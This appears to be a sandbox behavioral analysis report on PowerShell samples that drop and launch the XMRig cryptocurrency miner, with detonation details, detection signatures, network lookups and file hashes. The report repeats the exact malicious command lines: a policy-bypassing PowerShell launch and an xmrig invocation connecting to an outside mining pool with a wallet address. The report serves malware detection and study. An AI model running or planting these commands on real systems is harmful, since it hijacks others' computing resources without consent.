| PID 5064 wrote to memory of 4152 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g5k24220.1cc.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5064-26-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp
memory/5064-49-0x00000113A2F50000-0x00000113A2F62000-memory.dmp
memory/5064-62-0x00000113A2F30000-0x00000113A2F3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral15
Detonation Overview
| Field | Value |
| Submitted | 2024-05-25 15:43 |
| Reported | 2024-05-25 17:07 |
| Platform | win10v2004-20240426-en |
| Max time kernel | 1792s |
| Max time network | 1776s |
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 100 wrote to memory of 972 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 100 wrote to memory of 972 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ywfdp3qn.nmu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral26
Detonation Overview
| Field | Value |
| Submitted | 2024-05-25 15:43 |
| Reported | 2024-05-25 17:19 |
| Platform | win10-20240404-en |
| Max time kernel | 1798s |
| Max time network | 1793s |
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4076 wrote to memory of 4380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4076 wrote to memory of 4380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w35g4bz2.wdd.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |